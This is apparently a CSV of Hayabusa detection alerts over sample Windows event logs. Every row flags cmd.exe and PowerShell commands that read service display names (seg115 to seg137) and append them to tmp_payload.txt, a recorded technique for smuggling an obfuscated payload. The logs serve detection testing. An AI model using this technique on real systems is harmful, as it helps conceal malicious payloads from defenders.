2021-11-03 17:37:14.417 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x1dc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:14.417 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg115"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc88 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:15.867 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:15.867 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg116"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:17.309 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xcbc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:17.324 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg117"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x844 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:18.812 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:18.812 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg118"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc24 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:20.265 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:20.281 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg119"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd28 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:21.715 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x990 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:21.715 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg120"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd9c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:23.168 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe4c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:23.168 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg121"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe8c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:24.599 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:24.615 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x974 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:26.056 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x748 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:26.072 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa9c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:27.510 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:27.525 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe0c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:28.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc08 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:28.961 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc8c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:30.412 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd48 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:30.412 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf94 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:31.851 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg127"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x6e8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:31.867 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg127"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xce0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:33.302 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xbc8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:33.318 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9d0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:37:34.772 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3f8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:34.772 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb38 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:36.225 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:36.225 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x6a4 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:37.694 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:37.694 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfdc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:39.178 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:39.178 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:40.633 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x950 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:40.633 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:42.102 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd38 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:42.102 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7ec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:43.595 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xde8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:43.610 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:45.043 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x81c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:45.043 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg136"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx 2021-11-03 17:37:46.509 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg137"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
